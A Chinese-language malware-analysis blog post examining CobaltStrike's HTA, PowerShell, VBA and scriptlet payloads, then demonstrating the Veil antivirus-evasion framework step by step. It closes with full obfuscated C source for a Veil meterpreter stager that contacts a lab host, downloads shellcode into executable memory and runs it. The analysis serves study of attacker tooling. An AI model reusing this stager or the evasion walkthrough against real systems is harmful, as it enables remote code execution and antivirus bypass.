相关文章推荐
难过的橙子  ·  mysql - Default ...·  1 年前    · 
帅气的甘蔗  ·  Ubuntu ...·  1 年前    · 
谈吐大方的弓箭  ·  咨询指南:SAP ...·  1 年前    · 


概述

在上一节的的文章了,笔者对CobaltStrike的基本使用和PE样本进行了一个概要的分析。通过上一小节的内容,可了解CobaltStrike的基本原理和代码解密上线方法。在本节中,笔者将会对CobaltStrike其他类型的恶意样本进行一个分析。

由于foreign协议和beacon协议生成的样本解码方式相同,只是后续请求的方式不同,这里就不分开介绍了,只介绍beacon类型的样本。

HTML Application

CobaltStrike可生成三种类型的hta文件,分别是Executable、Powershell、VBA。


这三类样本的区别在于:

Executable 将会在hta文件中内嵌一个PE文件
Powershell 将会在hta文件中内嵌一段Powershell代码
VBA 将会在hta文件中内嵌一段VBA代码

Beacon_Executable

该类样本主要是创建一个包含VBScript的hta文件,在VBScript中,有一个硬编码的PE


脚本会在末尾将shellcode写入到evil_pe.exe中并通过Wscript.Shell加载执行


因此可以将这部分的shellcode赋值到010中保存为exe文件:


保存出来的pe是只有14kb,初步估计是上一小节分析过的加载器。


经过分析,可以确定该样本是CobaltStrike的的分段Payload加载器


Powershell

相比之下,Powershell类型的hta内嵌的shellcode体积就要小很多


该段Powershell代码主要是用于解密并执行中间一段base64编码的代码,中间的代码解码之后如下:


解码之后的Powershell依旧是解码执行base64编码的代码,不同的是,此次解码出来的将会是一个数据流,在后面解压缩执行。

所以可以将该段Powershell指令赋值到ps中执行,得到执行结果。


最后的这段Powershell代码首先会在末尾处通过[IntPtr]::size -eq 8 以判断当前的操作系统是32还是64位。若当前程序是64位,则以32位的模式启动。

这里调试ps1文件,直接将shellcode写入到2.txt中:


写入到1.txt中的内容还是一段Powershell指令,代码如下:


写入之后格式如下,写个简单的python脚本格式化即可


格式化出来之后可以发现这里的shellcode其实就是分段Payload中解密出来用于下载后续Payload的shellcode


VBA

内嵌VBA代码的hta相比前两类就要复杂一些


VBA类的hta主要是在hta中通过VBScript创建一个excel对象并填充恶意宏代码执行。

代码首先通过CreateBoject 创建了一个 Excel.Application对象并更改其可见属性为False


接着程序创建一个WscriptShell对象用于操作注册表,主要是添加宏的安全属性


准备工作完成之后,程序会给Excel对象添加工作表并且将宏代码填充进去:


最后通过Auto_Open方法调用宏:


所以可以直接在excel中创建一个宏对象,将hat文件中的宏代码拷贝过去调试,记得位置需要选择到当前的文档,而不是应用到所有模板


但是将宏代码插入到excel之前需要先把一些没用的代码给替换掉,原始代码如下,经过简单分析,可以知道每个符号分别应该替换为多少,并且直接将cha(xx)的形式替换为对应的符号,这个过程可以手动替换,也可以直接编写一个python脚本进行替换。


完全替换并格式化后的宏代码应该如下:


简单分析后可得知,宏代码中应该是编码了一段hex数据流,宏代码会将这段数据流读解码后读取到内存并通过rundll32加载执行


加载方式是直接写入内存


所以可以调试到 res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0) 的时候使用火绒剑查看rundll32.exe的进程信息,找到写入的进程地址,本例中为851968,将其转换为16进制得到d0000


获取到写入的地址之后,可以直接在火绒剑里面右键,查看进程信息,转到线程,双击之后,在内存查看窗口中输入转换后的十六进制地址:d0000查看内存


跳转过来之后可以发现,这片内存的数据就是我们之前分析过的shellcode。由于火绒剑本身不带有内存dump的功能,想要dump这片内存可以使用其他的内存dump工具。


Payload

除了直接生成恶意样本,CobaltStrike还支持生成各种语言的Payload,包括了C、C#、Java、Python等常见语言


其中C、C#、JAVA、Perl、Python、Ruby、VBA等类型的Payload均为硬编码的shellcode,而这段shellcode之前已经看到过不止一次了。攻击者可以编写任意的加载器,将这段buf加载到内存中执行。


COM组件的sct文件和上面分析的HTML APPlication的VBA相似,均为创建一个excel对象将预定义的宏代码写入进去执行:


同样的,Powershell类型的Payload跟hta类型的Powershell解码出来保持一致:


Powershell_cmd类型的Payload会直接生成一行可执行的Powershell指令,该条指令用于执行一段base64编码的指令


该段base64解码之后还是一段Powershell指令,该段Powershell指令依旧用于执行base64编码后的指令


内层的base64字符串解码之后是一段压缩后的shellcode,程序会通过IO.Compression.GzipStream解压缩这段数据通过IEX加载执行,这和hta的Powershell保持一致。

至此,除Veil之外,CobaltStrike生成的所有Payload都已经看完,通过对各种payload的简单分析可以得知,CobaltStrike看起来可以生成多种类型的payload,但其实本质上,payload所加载的shellcode其实是基本都是cs的downloader。

Veil

在上一小节介绍了CobaltStrike生成的各类payload,唯独没有介绍Veil,是因为Veil并不是可直接投入使用的语言,而是一款和CobaltStrike配合使用的免杀框架。

CobaltStrike客户端可以生成Veil类型的payload,攻击者将该Payload传入到Veil框架中即可生成具有一定免杀性的样本。

在kali中安装Veil只需要在确保配置的源可用的情况下执行apt -y install veil 即可快速安装

安装之后执行/usr/share/veil/config/setup.sh —force —silent 进行配置:


配置完成,在命令行输入veil指令就可进入到Veil:


Veil主要是包含了Evasion和Ordnance两个免杀工具,其中Evasion是用作文件免杀,Ordnance可生成一段Veil的Shellcode。接下来将以一个简单的例子讲述Veil框架的样本生成:

Make Veil for Autoit

在命令行键入use 1选择Evasion工具,可查看Evasion支持的一些命令,其中list指令可列举出Evasion包含的所有类型的Payload,use指令可选择Payload,info 指令可查看Payload的相信信息。


键入list命令查看可配置的Payload列表


Veil的Evasion一共包含了41中Payload,其中包括autoit的shellcode注入、meterpreter后门、cs后门、golang版本的meterpreter后门、lua的shellcode注入、perl的shellcode注入、Powershell版本的meterpreter后门、python版
本的meterpreter后门、python的shellcode注入、ruby的meterpreter后门、ruby的shellcode注入等等。

键入info 1 或者info autoit/shellcode_inject/flat.py 可查看第一类Payload的详细信息:


根据回显信息可知,autoit的Payload可直接编译成可执行文件。所以键入use 1 生成一个autoit的Payload试试


键入generate准备生成样本,Evasion提供了5种方式的shellcode,分别是

  1. Ordnance(默认)
  2. MSFVenom (MSF的Payload)
  3. Custom shellcode String (自定义的shellcode)
  4. File With Shellcode(十六进制的shellcode文件)
  5. Binary file with shellcode(二进制形式的shellcode文件)

这里看看Veil框架自带的样本,于是键入1,选择默认方式生成,接下来程序会让用户选择直接生成原始payload还是生成编码后的payload


而这里的Encoders其实只有一个xor方式


为了对比生成的shellcode情况,这里键入use 6 选择不进行编码,可以看到坏字符为\x00,无编码方式,接下来只设置好lhost和lport之后,键入generate即可生成payload


最后键入文件名,即可在Veil的文件目录下生成对应的exe文件:


Veil Autoit

通过工具解析这个pe文件,将autoit脚本dump出来如下:


Autoit脚本本身较短,主要就是将先前在Veil控制台生成的那段shellcode注入到calc.exe中

Veil默认生成的shellcode和上一小节cs的shellcode风格类似,但是短小了很多


经过快速的验证可以得知,该段shellcode就是CobaltStrike中用于下载后续payload的shellcode:


回到Veil框架中来,刚才在生成autoit的样本时候,Veil提供了五个选项用于生成不同的shellcode,上面经过试验可知Veil默认的shellcode和CobaltStrike中对应,接下来看看MSFvenom选项的shellcode。

在配置shellcode时候选择 2- MSFVenom,选择msf的shellcode,根据提示键入对应的信息,最后程序会生成一个名为payload1.exe的利用文件:


将msfvenom方式生成的样本dump出来,发现注入方式相同,但是注入的shellcode有所改变


msfvenom的shellcode和CobaltStrike的基本一样,但是感觉要稳定一些


关于MSF的shellcode为什么和CobaltStrike的shellcode如此相似,笔者会在下一篇文章中进行详细的介绍。

由于2 3 4 三个选项都需要payload作为输入,这个暂且不进行分析。从选项5到选项8,均为c语言的meterpreter


Veil2meterpreter

选择c/meterpreter ,Veil自动配置好了LPORT,需要用户手动键入LHOST和Filename。


配置完成之后,生成payload的时候,Veil会自动创建源代码文件和可执行文件,分别放入compiled文件夹和source文件夹中。

打开source文件夹中的use5.exe.c可看到该payload生成的C语言源码:


格式化之后完整代码如下

#define _WIN32_WINNT 0x0500#include #include #include #include #include #include char* HTzuNvhCcP(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0;i

-1)-i]=t[i]; } t2[length] = '\0'; return t2;}int xDEADohLQOWAzHd(char PRgNjrnBFiTU[]) { int ALonTwgUnqVHeP=0; int i; for (i=0;i, &euQsZxqczZN) < 0) { WSACleanup(); exit(1); }}char* OZNtVHUJ(){ char EqafcdrUDe[2322], lchzXusA[2322/2]; strcpy(EqafcdrUDe,"KsdJVurnXCZwEPwiYxMkTesCJnIcBzpzkbpihXhtoIKlPqSowe"); strcpy(lchzXusA,"WbxKqlvywkBPPFOwqjvVDYWNHzeRElhmgzEVedFMzzZIbLNYbN"); return OySGHDw(strcat( EqafcdrUDe, lchzXusA));}void MxzrqhwCGD(SOCKET HpKFhGTt) { closesocket(HpKFhGTt); WSACleanup(); exit(1);}char* ezkJzCUX(){ char *FoteTKotVa = HTzuNvhCcP("ntHkjiirjivMQLRcvIHfhkPRwprXXDMVwVCXKmYXzGjTKGqYtB"); return strstr( FoteTKotVa, "p" );}char* XqleexaJmujm(){ srand (time(NULL)); int i; char jXDHwTYg[] = "NpDPygsCZFz0fIlSQAO2c4xrb6vJYiWXGm1TVw3udUnkKa9EtBMLHjqheR58o7"; char* bMKWmB = malloc(5); bMKWmB[4] = 0; while (1<2) { for(i=0;i<3;++i) { bMKWmB[i] = jXDHwTYg[rand() % (sizeof(jXDHwTYg)-1)]; } for(i=0;ih_addr, Iaedcj->h_length); XIHDAdziTSd.sin_family = AF_INET; XIHDAdziTSd.sin_port = htons((673*12+4)); if ( connect(rrlyFfRiscWV, (struct sockaddr *)&XIHDAdziTSd, sizeof(XIHDAdziTSd)) ) MxzrqhwCGD(rrlyFfRiscWV); return rrlyFfRiscWV;}int main(int argc, char * argv[]) { char * EcQtTd; int i; char* YGADVFvMCa[5463]; for (i = 0;i < 5463;++i) YGADVFvMCa[i] = malloc (4182); MzItUPnp(); char* WCficlPxKiWRYg[264]; SOCKET mpmACD = rGEiHkVJYjGbir(); for (i = 0;i < 264;++i) WCficlPxKiWRYg[i] = malloc (2850); char mwKObmvDwOIuJ[200]; sprintf(mwKObmvDwOIuJ, "GET /%s HTTP/1.1\r\nAccept-Encoding: identity\r\nHost: 192.168.230.129:8080\r\nConnection: close\r\nUser-Agent: Mozilla/4.0 (compatible;MSIE 6.1;Windows NT\r\n\r\n", XqleexaJmujm()); send(mpmACD,mwKObmvDwOIuJ, strlen( mwKObmvDwOIuJ ),0); Sleep(300); EcQtTd = VirtualAlloc(0, 1000000, MEM_COMMIT, PAGE_EXECUTE_READWRITE); char* AGwAhuoOYGFoNzq[9887]; for (i=0;i<5463;++i) { strcpy(YGADVFvMCa[i], OZNtVHUJ()); } char * umWSfvQxRu = EcQtTd; int XHuuVPORMriW; do { XHuuVPORMriW = recv(mpmACD, umWSfvQxRu, 1024, 0); umWSfvQxRu += XHuuVPORMriW; }while ( XHuuVPORMriW > 0 ); for (i = 0;i < 9887;++i) AGwAhuoOYGFoNzq[i] = malloc (4361); for (i=0;i<264;++i) { strcpy(WCficlPxKiWRYg[i], ezkJzCUX()); } closesocket(mpmACD); WSACleanup(); ((void (*)())strstr(EcQtTd, "\r\n\r\n") + 4)(); for (i=0;i<9887;++i) { strcpy(AGwAhuoOYGFoNzq[i], UQVVQa()); } return 0;}

由于 6 7 8三个选项只是请求协议不同,加载方式还是大同小异的,这里就不分别对后面的进行生成和分析了。

不过关于Veil生成的meterpreter还是比较有意思的,本文篇幅至此,若是下一篇有机会的话将其完整分析补上。